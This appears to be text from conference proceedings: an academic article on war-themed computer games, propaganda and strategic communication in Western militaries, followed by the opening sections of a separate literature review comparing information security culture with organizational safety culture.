War-themed computer games also have the characteristics of real warfare planning (Allen 2010; Virilio 2009; Zizek 2010). In the games you can fight almost in a way that feels physically real, advancing block by block and firing at targets, enemies or objects, and you can change weapons and ammunition according to the power you need. On the other hand, in the games you can also plan and simulate operations as in real military staffs. In the games you can lead and give tasks, and switch operating environments and conditions. This is also done in real military operations (Allen 2010; Boisot, MacMillan, Kyeong 2007). The games also act as a recruiting channel, as young people have a natural command of gaming and the world of play. Game simulators placed in shopping malls give a realistic image of, for example, Afghanistan, and under the guise of entertainment they get young people interested in the military as an employer. In addition, the movie industry is using crime and war more and more as a frame of reference for the actual story (Peltoniemi 2009).
War shapes society and society shapes the suppositions related to war (Stahl 2010; Shaw 2005). War is rewriting its position as a part of western society, economy, politics and industry. The media, advertising and the Internet enable real-time data transfer in which the interfaces of different actors (political, social, economic, military) blend into one single information flow. The chance is born that society becomes permeated with security so that its actions can no longer be intervened in. Also, the blending of weapons systems so that they become more and more like regular IT systems, especially in the sphere of information warfare, makes the definitions of warfare, weapon and soldier relative. Clear norms related to violence lag behind the actual cases. A typical example of this is the information battle between Wikileaks and the Pentagon. The facts are missing and we depend on impressions (Ellul 1965; Gray C.H. 2002).
In this article I try to describe the postmodern complex networks of the different kinds of actors involved in making war and security. The main argument is that all actors, from a single poor young dropout to a high-level political state member, are part of the complex 'military-industrial-advertising systems'. The real combat, for example in Afghanistan, is connected to the high-technology industry and the advertising market. For example, the warfare of the information age is represented by computer games. There is also a possibility that the news of war and conflict is not real anymore, but a complex level represented and framed to a level that is familiar to our senses (Stahl 2010).
2. The propaganda of war - perception and its representation
Charles S. Peirce is one of the creators of the concepts of semiotics and representation. According to his theory, the moment before a person becomes conscious is preceded by a numerous series of perceptions of which we are unaware. In other words, according to him, we are never temporally and directly in simultaneous contact with the object. The object is thus a hypothetical boundary, which can be approached but never touched as such. This assumption is based on the idea of the continuity of time (Bergman 2010, 80-81). Representation means two different kinds of phenomenon. The first is the attempt to return the phenomenon into this moment. The second is to stand for the absent phenomenon. The representation of the world is not real, because there is always something beyond the frame of representation. The increasing amount of information we receive by sight makes it impossible for us to filter all of it. This means that "the more you watch, the less you know" (Strazzanti 2009: 14).
Thus, we are always looking at the world through some frame or other. When a journalist reports the news from Afghanistan or a producer of video games designs a war game, the attempt to say something about the actual activities is always limited and subjective. The point of view of the media is also always subjective. And even the best video game can do no more than provide a representation of actual warfare. Today, the reasons for war are justified in the narrative struggle between different viewpoints. The credibility of different stories is weighed through the media. With their opinions, people vote on whose story is the most credible. We can no longer speak of the truth. In relation to war there is no such thing, since the producer or author of a documentary or a piece of news is connected through different networks to the makers of war themselves. The salaries of those who photograph war are paid through war and its making. Correspondingly, video games need real soldiers who have experienced combat in order to be developed in a more authentic direction (Krishnan 2009; Palojärvi 2009; Stahl 2010).
According to Ellul (1965), propaganda is a social phenomenon rather than something that is made by certain people for certain purposes. Propaganda exists and thrives. Propaganda aims not only to change people's opinions, but tries to lead men into action. Ellul sees propaganda in two forms: agitation propaganda and integration propaganda. Integration propaganda is an organic part of a technological society. Modern propaganda also cannot work without knowledge of technological science. Not only is propaganda itself a technique, it is also an indispensable condition for the development of technical progress and the establishment of a technical civilization. The propagandist is anyone who communicates his ideas with the intent of influencing his listener.
The so-called "diffused audience" (Hoskins and O'Loughlin 2010, 14) means that everyone becomes an audience all the time and there is no possibility of analysing beforehand who will be the target audience in a specific case. Decision-making is done through automated surveillance of both online and offline behaviour. These surveillance technologies "screen out" the normal but bring into focus the unusual behaviour (ibid., 15). Diffused war is the name of a new paradigm of war in which the mediatisation of war makes it possible to diffuse the causal relations between action and effect further, creating greater uncertainty for policymakers in the conduct of war (Hoskins and O'Loughlin 2010, 3). Today both the sphere of policy and the sphere of business operate under the laws of marketing. Politicians cannot gain support without political advertising promoting them and their policies as trademarks. In the case of war, propaganda campaigns are crucial in order to gain public support (Strazzanti 2009).
The link between classical propaganda as a specific technological tool and today's concepts such as strategic communications is not so far-fetched. Everything must also be utilized. A good propagandist must use not only all of the instruments, but also different forms of propaganda. The ground must be sociologically prepared before one can proceed to direct prompting. Propaganda tends to make the individual live in a separate world; he must not have outside points of reference. Nowadays, the Internet is based on the same idea, but upside down: there is no possibility to exist without communication. There are no lines between private and public life.
According to the "NATO Military Concept for Strategic Communication" (15OCT2009), executing a Strategic Communications process may require cultural or organisational change, as it requires a network-centric approach and a speed of decision making that may be at odds with more traditional, hierarchical military structures. It involves empowering the release of information at levels far below that of most current structures, and an acceptance of greater risk in that information released quickly may not always be perfect and will require follow-up and refinement. It also requires the development of a strategic narrative that will shape NATO's actions and the manner in which those actions are communicated.
NATO policy defines NATO Strategic Communications as follows:
"The coordinated and appropriate use of NATO communications activities and capabilities – Public Diplomacy, Public Affairs (PA), Military Public Affairs, Information Operations (Info Ops) and Psychological Operations (PsyOps), as appropriate – in support of Alliance policies, operations and activities, and in order to advance NATO's aims". (NATO Strategic Communications Policy, 29 Sep 09).
However, from a military perspective, the Strategic Communications process seeks to coordinate the work of the traditional communication functions of Public Diplomacy, PA, Info Ops and PsyOps not only with each other, but also with the critical operational non-kinetic and kinetic elements, which often convey far more meaning and have an immeasurably greater impact on people's perceptions than words or imagery alone ever could.
3. Information and decision making in three different worlds
In this chapter I describe the change in war through three different worlds as follows:
Table 1: The way of war in three different worlds

| | Rational world | Complex world | Postmodern world |
| Weapon(s) | machine gun | nuclear weapon | Internet |
| The nature of knowledge | rational knowledge | information flow | narrative stories |
| Society | agrarian society | industrial society | information society |
| The name of wars | World War I and II, Holocaust | Blitzkrieg 1939-1941, Pearl Harbour 1941, WTC 2001 | civil wars, French Revolution, Communist Revolution, Vietnam, War Against Terror |
| Slogans | We have to decide | We have to exploit every channel to communicate | Nothing is anything, everything is all |
| The model of competition | state versus state | technology versus technology | public actor versus private actor, human versus robot |
| The structure of organization | linearity, bureaucracy, rules | complexity, system | mycelium, conflict |
| The key actors | muscles, brains | communications | consume |
| The key thinking model | first you plan, then you execute | planning and execution parallel | planning = execution |
| The authors | Max Weber, Frederick Taylor, "franchising", Clausewitz, Jomini | Herbert Simon, James G. March, Peter Drucker, "corporate governance", "bounded rationality", John Boyd, John Warden | Critical Management Studies (CMS), "The Practice Turn", Michel Foucault, Paul Virilio, Slavoj Zizek |
The model of three possible worlds does not mean that it is a list from best to worst or an evolutionary process. The rational world affects our time just like the complex and the postmodern ones. For example, military traditions and routines are still formal by nature and even fanatically rational, sometimes almost to a religious extent. After all, the rational paradigm strives to control and rule the world by being meticulous and by eliminating errors. Asking too many questions is avoided and the chosen avenues of action are made more effective by planning. In western countries public administration is still a rational bureaucracy directed and prescribed by legal means. Meanwhile, networking and information technology are permeating the future operations of organisations, through different innovation models, security- and safety-oriented thinking and strategic leadership thinking models. The idea of technology and systems thinking is that the world cannot be controlled from the outside by means of rational planning; rather, control is exercised through practices that are formed by interconnected technology networks. Alongside the rational and complex worlds, in the different flashpoints of the world there is a very large asymmetry between the crisis management machine of the West, the local inhabitants and the terrorists. The combination is conflicting in a postmodern way (e.g. Kilcullen 2009).
Information context has a much larger effect on our observation than facts do. A good example of this is a classic decision-making experiment. The person arranging the experiment auctions a 100 dollar bill to a group of approximately 30 people. The highest offer wins the bill, but the one with the second highest bid has to pay the amount of their own bid without getting anything in return. At first there are plenty of bids, because everyone thinks that it is good to bid 20 or 30 dollars for a 100 dollar bill and drop out of the bidding in time. When the bidding nears 100 dollars, usually only two bidders remain and an authority competition develops between them. When the bids pass 100 dollars, the two competitors may continue high risk taking in order to avoid the dead end of the second best bid. The end result usually is that a 100 dollar bill will cost the winner 200 dollars (of course the net loss is 100 dollars) and the one with the second highest bid has to pay 195 dollars without getting anything in return.
This example demonstrates the social and contextual nature of our decision making. Usually people with a high competitive drive take enormous risks while trying to maximize the winnings, no matter what the cost. In politics and warfare there are countless examples of this: decision making is rarely a rational event, but is rather based on social and emotional relationships, expectations of our roles and the mental trap of risk taking (Soeters, van Fenema, Beeres 2010; Taylor 2010; Zizek 2009 and 2006).
However, war cannot change its nature. War is still organised violence. The question is whether the new wave of warfare causes evolution or revolution. The change has happened in the character of wars and the manner in which wars are conducted. As the first and second Iraq wars show us, war is not about eliminating targets and dominating the enemy's military power. It is purposeful violence to achieve a political goal. Warfare may be becoming revolutionized, not military affairs (Shimko 2010; Friedman 2009; Lind 2010). Still, most of the current military thinking on information operations (Info Ops) and strategic communications is based on the assumption that it is possible to take command and control (C2) of the battle space (Taylor 2010, 13). Info Ops is not about what you say but what you do. In a military organisation, its physical superiority and technological advantage work against it, because all through western military history the key issue for victory has been "de-escalation". The state military must seek in every possible way to de-escalate, to resolve the situation without violence or with a minimum amount of violence (Lind 2010, 35). The key idea of the new model of the science of war will be the so-called "Joint Distributed Operations".
4. Computer games as a way of communication in three different worlds
This chapter introduces the computer game exercise held for the cadets in the Bachelor's degree programme at the Finnish National Defence University in the autumn of 2009.
During the course Introduction to Leadership, in 2009, three computer games were introduced, each representing its own genre. Modern games are increasingly combinations of different genres. During the course, the three games of different genres were used to demonstrate the development of interaction between the game and the player.
The enormous technological development and the increased turnover mean that arcade and video game programming companies have been able to grow and develop new genres and platforms. Usually games are categorized based on their mechanics. This means that two games of the same genre may differ from each other in terms of narratives and visual properties. Many games exploit several game mechanics; for example 'party games', developed to be used by several people using the same console, typically consist of a range of 'mini games' and genres. A game may also consist of one genre only. An example of this would be a 'fighting game', which focuses on the close combat between the character controlled by the gamer and the adversary controlled by the programme.
4.1 The games of the 'rational world'
The logic of the 'rational world's' games is that the player or "cyber-soldier" actively controls the game, which passively reacts to the player's actions. The decision making process is based on the idea of a rational environment and rational communication relationships. This means that the player has to be precise and act both quickly and accurately. Communication is not a dialogue between game and player. When the player makes mistakes, the game only becomes passive. The basic idea is that reality can be controlled immediately and there is no difference between the representation processes.
One of the first games to be introduced was Super Mario Brothers, which is a limited-range game where the character moves from one level to another. Typical for games of this type is that they present the character from a side view, and that the game advances in different 'worlds' or on different levels, where the character collects items, dodges objects, destroys enemies and solves different problems. In Mario the objective is very clear: to save princess Peach from the evil Koopa turtle. In order to do this, the player has to pass several levels, at the end of which there are different opponents that test the player's skills and nerves. On the last level the player confronts the king of the Koopa turtles, and after defeating him the game is over. The player interacts with the game by controlling the motions and movements of the character with the buttons of the controller, and by aiming to advance onto the next level. The game does not allow the player to vary game strategies; the player has to 'pass' the game with a set trick and advance within the limits set by the game. The game gives feedback by notifying the player of the value of the 'coins' collected during the game, and of the time left to complete the level. If the character fails to complete the task, the player loses a 'life', which gives the player new chances to try and complete the level.
Simple 'jump level' and adventure games are now mainly entertainment used on portable platforms while travelling, or a game type for players who want to compete against the computer. There is also international competitiveness. For this game type there are lists of high-scoring gamers, which allow competition against someone with a better score. This is typical of mobile phone games, as the spread of wireless networks allows the use of the Internet also while on the move.
4.2 The games of the 'complex world'
In the games of the 'complex world' the player adopts a position in the game and the game gives feedback on the player's capability to understand the networks within the game. The player is the more dominant part of the game. The decision making process is based on the idea of a complex system-based environment and communication relationships. The basic idea of this level is that there are different kinds of representation processes, but we can still control them.
As an example of this genre, the shooting game Half Life and Counter Life, which is designed especially for online gaming, can be introduced. It is an FPS (First Person Shooter) game, where the player controls a terrorist or a counter-terrorist character, in first person, in a team-based shooting game. The duty of the counter-terrorists is to prevent the activation of a bomb or dismantle it, rescue hostages or protect VIPs. Respectively, the terrorists try to plant the bomb at its target, hold the hostages, or stop the VIPs from entering the secure area. The game is played for certain lapses of time, during which either of the parties has to complete its mission. The goal of the team is to play a certain number of rounds, and the team winning most rounds also wins the game. A team may win either by completing its mission or by eliminating the enemy team. A reward system is a crucial part of the game: victories, both team and personal, are rewarded with 'money', which can be spent on better arms and equipment.
The big change compared to jumping levels and a restricted game environment is the interactive impact of the players on each other. The game contains maps, which do not necessarily influence the player's actions but create the aims and 'frames' for the players. Factors affecting the gaming are the cooperation between the team members and the impact caused by the enemy. Controlling the game is made simple, but succeeding in the game requires practice and several hours of experience in eye-mouse coordination. This is why FPS games are referred to as skill games, and there are several individual and team esports (electronic sports) tournaments both online and at LAN events.
4.3 Games of the 'postmodern world'
In the games of the 'postmodern world' the game and the players are equals and the player has no authority over the course of the game. Communication is bidirectional. The games of the postmodern era are an analogy for the transition into social media, which, in a sense, is a simulation of postmodern computer games. The decision making process is based on the idea of a chaotic and non-rational environment and communication relationships. The basic idea is that there are different kinds of narratives and we have no one and only right representation process.
As the third game example we introduce an MMORPG (Massive Multiplayer Online Role-playing Game), World of Warcraft. Computer role-playing games are traditionally understood as games where the player creates and controls the character, and the properties and skills it develops as the game advances. Role-playing games may be either serious, plotted games where the focus is on problem solving or on the development of the plot, or fast-paced combat games. In traditional tabletop games, enacting the character is part of the game. This is a feature most computer games lack, but depending on the players, they may empathise with their characters. Especially in online role-playing games this option is available; for example, in World of Warcraft the players are offered special RP (role playing) servers, where the rules of the server demand devotion to the game character's role.
In World of Warcraft and in the genre it represents, the player can utilise the features of traditional role-playing games in creating and developing their character. Playing on the Internet with other players creates a social element in the game, where developing your own character and accomplishing missions together with others, managing your wealth and the battles between the players are important aspects of the game. At the moment, World of Warcraft is the most successful online game of its genre, with almost 11 million players worldwide. Especially successful features of the game are its realization of the game 'world', the missions executed alone or as a team, and the development of the characters and their battles. An example of a well-realized social aspect is the large guild networks, through which it is possible to organise guild cooperation, such as conquering caves and battling group against group. The possibility to play either alone or as part of a group makes MMORPGs highly interactive. A single player may witness a lot of content variation due to the other gamers' actions and due to the extensive game 'world'.
In modern MMORPG gam<strong>in</strong>g culture also the f<strong>in</strong>ancially substantial tournaments are essential. Usually<br />
tournaments focus on a certa<strong>in</strong> aspect of the games, e.g. combat. The develop<strong>in</strong>g ESports-leagues<br />
advance competitive gam<strong>in</strong>g and have created the subtype of professional gam<strong>in</strong>g, especially <strong>in</strong> World of<br />
Warcraft, where the players combat each other "to the last man".<br />
5. Conclusions - eye as a function of weapons

In the Western security understanding, the function of the eye has become the function of weapons. Western culture has moved from living a physical life to sitting behind the computer screen. When you can see the target on your screen, you expect to influence or (in a combat environment) destroy it. What is perceived is already lost. We cannot live without acting and communicating. Unlike weapons, which have to be publicised if they are to have real deterrent effects, stealth equipment can only function if its existence is clouded with uncertainty. This is the so-called "aesthetics of disappearance" (Virilio 1989).

The history of the games industry is heavily concentrated on the USA and Japan. The United Kingdom, South Korea and Canada are also very strong. In the USA 40% of gamers are female. There is an argument that the easy access to guns in the USA has more of an effect on gun violence than shooting games do (Peltoniemi 2009). A "rational-complex-mycelium chain" can be observed through the development of game mechanics. The older games, in the 1970s and 1980s, were all rational: only one correct solution and order in which to complete things. In the 1990s the free-roaming or sandbox games became popular, where the player defines the goal and there are many ways to reach it. These can be seen as complex games. A well-known example of a game like this is Sim City from 1989. We can also see the same trend in the evolution of Western security needs and the military-industrial complex.

In this article I have tried to describe that the more electronic solutions we have created in a battle space, the more rational the art of war still remains. The Vietnam War became a testing ground for electronic warfare and automated command and sensor networks. Information warfare is also the reflection of all our fantasies, dreams and wishful thinking. Not the least of these, the dream of invisibility, is formalised by the possibility of acting in cyber (computer) space by masking our identity, by remaining elusive, untraceable and unidentifiable. Attackers use this capability. Absolute information control and dominance is based on the idea of understanding everything and seeing beyond the horizon without being seen.

Aki-Mauri Huhtinen
References

Allen, Patrick D. (2010) Information Operations Planning. Boston: Artech House.
Armitage, John. (2003a) "Militarized Bodies: An Introduction". Body & Society, vol. 9, no. 1, pp. 1-12.
Baudrillard, Jean. (2010) Carnival and Cannibal. Ventriloquous Evil. London: Seagull Books.
Baudrillard, Jean. (2005) The System of Objects. Translated by James Benedict. London: Verso.
Bergman, Mats. (2010) "Presentaatio vai representaatio? Charles S. Peircen perseptioteorian merkilliset vaiheet". In Tarja Knuutila & Aki Petteri Lehtinen (eds), Representaatio. Tiedon kivijalasta tieteiden työkaluksi. Helsinki: Gaudeamus Helsinki University Press, pp. 75-94.
Boisot, Max H., MacMillan, Ian C., and Han, Kyeong Seok. (2007) Explorations in Information Space. Knowledge, Agents, and Organisation. Oxford: Oxford University Press.
Bousquet, Antoine. (2009) The Scientific Way of Warfare: Order and Chaos on the Battlefields of Modernity. London: Hurst & Company.
Campen, Al. (1996) Cyberwar. Washington DC: AFCEA Press.
Campen, Al. (1992) The First Information Warfare: The Story of Computers and Intelligence Systems in the Persian Gulf War. Washington DC: AFCEA International Press.
Czosseck, Christian and Geers, Kenneth (eds). (2009) The Virtual Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press.
Ellul, Jacques. (1965) Propaganda. The Formation of Men's Attitudes. Translated by Konrad Kellen and Jean Lerner. New York: Alfred A. Knopf.
Friedman, Norman. (2009) Network-Centric Warfare. How Navies Learned to Fight Smarter through Three World Wars. Annapolis: Naval Institute Press.
Gray, C. H. (2002) Cyborg Citizen: Politics in the Posthuman Age. London: Routledge.
Gray, Colin. (2007) Another Bloody Century: Future Warfare. London: Phoenix.
Hoskins, Andrew and O'Loughlin, Ben. (2010) War and Media. The Emergence of Diffused War. Cambridge: Polity Press.
Kilcullen, David. (2009) The Accidental Guerrilla. Fighting Small Wars in the Midst of a Big One. London: Hurst & Company.
Krishnan, Armin. (2009) Killer Robots. Legality and Ethicality of Autonomous Weapons. Ashgate.
Lind, William. (2010) "The Power of Weakness". In David, G. J. and McKeldin III, T. R. (eds) (2009) Ideas as Weapons. Influence Perception in Modern Warfare. Washington D.C.: Potomac Books, pp. 35-38.
NATO. (2009) "NATO Military Concept for Strategic Communication" (15 October 2009). Available at: http://www.nato.int/shape/news/2009/12/091215a.html (accessed 07.02.2011).
Palojärvi, Pia. (2009) A Battle in Bits and Bytes: Computer Network Attacks and the Law of Armed Conflict. Publications of the Erik Castrén Institute of International Law and Human Rights, University of Helsinki. The Erik Castrén Research Reports 27/2009.
Peltoniemi, Mirva. (2009) Industry Life-Cycle Theory in the Cultural Domain: Dynamics of the Game Industry. Tampere University of Technology, publication 805. (Dissertation).
Shaw, Martin. (2005) The New Western Way of War. Risk-Transfer War and its Crisis in Iraq. Cambridge: Polity Press.
Shimko, Keith L. (2010) The Iraq Wars and America's Military Revolution. Cambridge: Cambridge University Press.
Soeters, Joseph, van Fenema, Paul C. and Beeres, Robert. (2010) "Introducing military organizations". In Soeters, J., van Fenema, P. C. and Beeres, R. (eds) Managing Military Organizations. Theory and Practice. London: Routledge, pp. 1-14.
Stahl, Roger. (2010) Militainment, Inc. War, Media, and Popular Culture. New York: Routledge.
Strazzanti, Laura. (2009) Did the Media Sell War as a Product? The Case of the Iraq War 2001-2003. München: Martin Meidenbauer Verlagsbuchhandlung.
Taylor, Philip. (2010) "The Limits of Military Information Strategies". In David, G. J. and McKeldin III, T. R. (eds) (2009) Ideas as Weapons. Influence Perception in Modern Warfare. Washington D.C.: Potomac Books, pp. 13-16.
Taylor, Philip. (2003) Munitions of the Mind: A History of Propaganda from the Ancient World to the Present Day. 3rd edition. Manchester: Manchester University Press.
Virilio, Paul. (2009) The Aesthetics of Disappearance. Translated by Philip Beitchman. Los Angeles: Semiotext(e).
Virilio, Paul. (1989) War and Cinema. The Logistics of Perception. Translated by Patrick Camiller. London: Verso.
Information Security Culture or Information Safety Culture – What do Words Convey?

Ilona Ilvonen
Tampere University of Technology, Tampere, Finland
ilona.ilvonen@tut.fi
Abstract: In the contemporary world of constantly changing information threats, information security culture is a concept that many organizations should emphasize. Many threats cannot be countered only with sophisticated technical equipment. Instead, the attitudes and actions of employees gain significance each day, be the threat an urge to leak company confidential documents to Wikileaks or to competitors, or willingness to help a "colleague" with an unconventional request. Information security culture is a concept widely accepted in the field of information security research. It refers to the dominant understanding of how information security principles are manifested in the daily operations of a company. The culture implies what kind of behaviour of the employees is acceptable and encouraged. Literature about information security almost without exception uses the word security. However, in the field of organizational safety culture, the word security has little use. What is different? Is preventing human or material casualties really fundamentally different from preventing information casualties? This paper is triggered by curiosity about how different literature streams discuss culture, be it called safety culture or security culture. The differences in approaches to security and safety are also analysed. The term safety includes both the perspective of an object being protected from threats and the perspective of that object not causing threats. The term security includes only the perspective of an object being protected from threats. It is interesting to note that both the words safety and security appear in the definitions of the term security. In information security the focus for many organizations is on the threats that come from outside the organization. This seems to justify the use of the word security. However, in many cases the biggest threats to the information of an organization come from inside the organization. Also, many organizations state that the information of customers is the most valuable to them, and compromising customer information would harm not only the organization itself but also its stakeholders. This would justify the use of the word safety in connection with information. This paper presents a literature review. The outcome of this paper is an understanding of the differences and similarities of the concepts under study. Discussion on the meaning of information security culture and its implications for companies is presented.

Keywords: Information security, security, safety, information security culture, concept analysis, meanings
1. Introduction

Organizational culture is an area where a lot of research is conducted to understand the dynamics of organizations and the way people behave in them. Over time, approaches to the study of organizational culture have varied from sociology to management (Denison 1996). Research approaches have varied from ethnographies to action research and quantitative questionnaires (Denison 1996, Guldenmund 2007). In this paper organizational culture, specifically safety culture literature, is contrasted with information security culture literature. Although both share the same roots, there are also fundamental differences between these fields.

Before safety and security culture as concepts can be discussed further, a brief look at the terms safety and security is needed. In everyday language these terms are often used as synonyms. However, there are some differences in the definitions of these terms.

Safety:
- The condition of being protected from or unlikely to cause danger, risk, or injury
- Denoting something designed to prevent injury or damage (Oxford Dictionary of English)

Security:
- The state of being free from danger or threat
- The safety of a state or organization against criminal activity such as terrorism, theft, or espionage
- Procedures followed or measures taken to ensure the security of a state or organization
- The state of feeling safe, stable, and free from fear or anxiety (Oxford Dictionary of English)

Based on these definitions, we can make the distinction that the term safety includes both the perspective of an object being protected from threats and the perspective of that object not causing threats. The term security includes only the perspective of an object being protected from threats.
Literature about information security almost without exception uses the word security. However, in the field of corporate safety culture, the word security has little use. Still, in both frameworks the organization can be both the target and the source of threats, although depending on the industry the proportions of these two may vary. This paper is triggered by curiosity about how different literature streams discuss culture, be it called organizational culture, safety culture or security culture. The outcome of this paper is an understanding of the differences and similarities of these concepts. In the following, first the concept of organizational culture is examined. Then both safety culture and information security culture literature streams are introduced. These streams are then compared and analyzed.
2. Organizational culture

Organizational culture is a concept that emerged in scientific literature as early as the 1950s (Guldenmund 2000, Denison 1996). The term, however, really manifested itself in the scientific literature in the early 1980s (Paalumäki 2010). Before this, most research was done under the term organizational climate. One approach to linking these concepts together is to define organizational climate as something that emerges from the organizational culture (Guldenmund 2000). This means that organizational climate reflects the organizational culture, which is a more embedded construct and more difficult to research than organizational climate.

Guldenmund (2000) defines organizational culture as having seven characteristics:
- It is a construct rather than a concrete phenomenon.
- It is relatively stable, i.e. it changes slowly over time.
- It has multiple dimensions. These dimensions also vary depending on the researcher or author.
- It is shared by groups of people, and it is holistic. This means that the way the components or levels of the culture construct the culture also needs to be examined.
- It consists of various aspects; this means that several different cultures or climates can be distinguished within an organisation, e.g. a service climate or a safety culture. These distinctions have only been made for analytical or practical reasons, to make the concept more tangible.
- It has many layers, and the more "superficial" the layer, the easier it is to change. Certain practices can constitute a culture, which is in many cases learned, be it national culture or organizational culture.
- It is functional. A simple and well-known definition of culture reads "the way we do things around here", which effectively captures this functional aspect.

"Overall, organisational culture is a relatively stable, multidimensional, holistic construct shared by (groups of) organisational members that supplies a frame of reference and which gives meaning to and/or is typically revealed in certain practices." (Guldenmund 2000)

According to Schein, organizational culture manifests itself on three levels: the level of artifacts, the level of values and the level of beliefs (Schein 1984). The level of artifacts is the visible level of culture, which is easy to examine but hard to interpret. Other authors distinguish more layers in what Schein calls artifacts (Guldenmund 2000). For example, the office space and working materials of an organization can be examined, but understanding the meaning of the office layout or of the materials and instructions can be difficult. For this understanding, the values of the organization need to be examined. This can be done by interviewing organization members and by analyzing the artifact contents. Even this analysis, however, does not provide a full understanding of why organization members behave the way they do. To gain true insight into the culture, the level of assumptions and understandings needs to be examined.

Many authors mention organizational stories as one layer or element of the organizational culture (Guldenmund 2000). Although organizations are unique, there are typical stories that present themselves with small variations across different organizations. These stories can be either positively or negatively oriented. Positive stories depict heroes who have somehow saved the organization, overcome exceptional struggles or shown unexpected devotion to the organization. Negative stories depict situations where management doesn't follow guidelines or acts unreasonably (Martin et al. 1983).

These stories represent a way in which each organization can distinguish itself from the others. Although similar in structure, each story is unique in how it represents the culture of the company it is born from (Martin et al. 1983). An interesting viewpoint on organizational stories is to contrast them with Schein's levels of organizational culture. An organizational story can be an artifact (Schein 1984) in case it is written in an explicit form and in one way or another distributed through the organization. Many success stories are, or could be, used as artifacts to help people identify themselves with the organization. Negative stories, however, do not necessarily appear in an explicit form. If they are spread by word of mouth, are they artifacts? Rather, they are on the level of values: they convey, for example, the way management follows the explicit values of the company.
Figure 1: The levels of organizational culture (applied from Schein 1984)
3. Safety culture

Similar to organizational culture, safety culture research began as safety climate research (Clarke 2000). Safety climate scores were expected to reflect the accident rates in companies, since the safety climate works as a frame of reference for employee behaviour (Zohar 1980 in Grote 2007). This means that in safety culture, too, the safety climate is seen to reflect the underlying safety culture, as illustrated in Figure 2. Cooper (2000) defines safety culture as a sub-culture of the organizational culture, unless an organization acts in a high-risk industry, which would make safety culture the dominant culture in the organization. Safety culture, however, is not homogeneous throughout a company. Different departments and teams may have their own conceptions about priorities, for example between safety and production. Priorities vary according to risk profiles, but these differences lead to differences in the safety cultures across the organization (Cooper 2000).
[Figure 1 contents: Observable level - Artifacts & Creations (technology; art; visible & audible behavior patterns): visible but often not decipherable. Values: greater level of awareness. Underlying level - Basic assumptions (relationship to environment; nature of reality, time & space; nature of human nature; nature of human activity): taken for granted, invisible, preconscious.]

[Figure 2 contents: labels "Safety culture" and "Safety climate".]
Figure 2: Relation between safety culture and safety climate
Grote (2007) sheds new light on the discussion of safety culture, which is often considered quite superficially as safety-promoting norms and attitudes shared by the members of an organization. According to Grote, a positive safety culture means centralized values and norms that work as a strong basis for the choices that people make when they work autonomously and in a decentralized manner. Culture is seen more as a means to provide sufficient coordination and integration of otherwise autonomous agents than as the general assurance of safety as a core value (Grote 2007). The notion of Cooper that each department may end up with a different safety culture is countered by the approach that key values and norms need to be actively driven in the organization, so that they build a homogeneous basis for the different safety cultures.

Up to this point this paper has dealt mainly with different approaches and definitions of the concepts at hand. Interesting as they are, these definitions do not address much how a positive and beneficial safety culture is achieved. Measuring the elements of a safety culture is tricky, since culture is a complex construct with many elements that are difficult to measure. The organization creates safety, and this is only one aspect of its actions. By understanding the operations of an organization, the safety needs can be more precisely defined. If there are multiple goals, these goals can contradict the safety goals (Reiman & Oedewald 2010).

Measuring the effectiveness of safety culture is more easily said than done. One measure commonly used is the accident and incident rate. There is, however, one big risk connected with this measure: accidents and incidents get hidden. The accident rate tells about the safety culture, but also about the ability of employees to hide minor accidents. If it was not reported, it never happened. This kind of attitude does not foster a proactive safety culture, which benefits from all information about accidents, incidents and near misses. One factor of a safety culture is the communication and use of safety incident information (Díaz-Cabrera et al. 2007). A simple, common-sense way of interpreting this factor is that if safety reporting is really used for improvement and employees participate in the analysis and improvement efforts, they are motivated to report safety incidents. In some organizations the managers and workers may have very different understandings about safety (Harvey et al. 2001), which may lead to a situation where employees feel management is only interested in the safety report numbers, not the phenomena behind them.

"Organizations are defined by what they ignore - ignorance that is embodied in assumptions - and by the extent to which people in them neglect the same kind of considerations" (Weick 1998 in Reiman & Oedewald 2010). Safety is always something that is defended against recognized risks. Organizations need to be humble and admit that all risks can never be recognized. Actions should be directed at recognizing risks as early as possible. A good safety culture maintains a healthy, humble attitude throughout the organization. To achieve this, the previously mentioned measurements need to support the safety culture.

4. Information security culture

According to Martins & Eloff (2002), information security culture refers to the dominant understanding of how information security principles are manifested in the daily operations of a company. The culture implies what kind of behaviour of the employees is acceptable and encouraged (Martins & Eloff 2002). von Solms (2000) agrees to a great extent with the previous definition. According to him, the information security culture has to support the instructions and procedures of the organisation so that information security will become a natural part of daily routines (von Solms 2000). According to both of these sources, information security culture can also be consciously developed by directing employee behaviour in the desired direction. Schlienger & Teufel (2003) also have a somewhat similar approach to the concept. According to them, information security culture contains all the socio-cultural methods that support technical information security. Through their implementation, information security becomes a part of daily operations (Schlienger & Teufel 2003). These definitions show that information security culture, contrary to safety and organizational culture research, is not directly born from information security climate research.

Information security culture is a relatively new concept, and definitions for it do not vary much. The definition of the concept is complicated by the use of related terms. Information security awareness (Siponen 2000, Tsohou et al. 2008) and information security obedience (Thomson et al. 2006) are examples of terms with parallel definitions. Making a clear distinction from the concept of security culture is difficult; for example, Ruighaver et al. (2007) and Schlienger & Teufel (2003) use the term security culture to mean roughly the same as the others mean by the term information security culture.
All of the previous sources are connected by the approach that information security culture intensifies the implementation of technical information security initiatives. According to them, a good information security culture encourages the employees to obey security instructions because they understand the reasons for them. However, Ruighaver et al. (2007) have a different view. According to them, this kind of approach limits the information security culture to only a small part of information security and, furthermore, confirms an old belief according to which information security is mostly a technical issue. They emphasise that information security is mainly a concern of the top management. The information security culture reflects the degree of success of management in addressing this concern. This is why the authors underline that an attempt should not be made to create an information security culture. Instead, the tools and policies of the company should be adapted to the dominant information security culture (Ruighaver et al. 2007). This approach reflects the fact that it is much easier to affect the procedures and tools than the culture. However, the authors do not fully address the situation of having a poor security culture and how to deal with it.
Information security culture is examined, similarly to safety culture, mainly through employee attitudes and behaviour. Still, some authors emphasize that there are deeper layers to information security culture than just the layer of behaviour and attitudes, which is a similar notion to safety culture.
5. Security culture and safety culture - insights
When the previous sections on safety culture and information security culture are compared, an interesting observation can be made: the definitions of the concepts do not differ significantly. Information security culture definitions emphasize the role of instructions and procedures a little more than safety culture definitions do, but this difference is not fundamental. A similarity between all of the sources cited in this paper is that not much consideration is given to the terms security, safety or culture. The meaning of these terms is taken for granted, and the only concept in need of definition is the construct of the terms: safety culture or security culture. This is in spite of the fact that the term culture or organizational culture does not have a single definition that could be assumed to be known and agreed upon by the readers, as introduced in the second section. Also, the meaning of the words safety or security is not discussed.
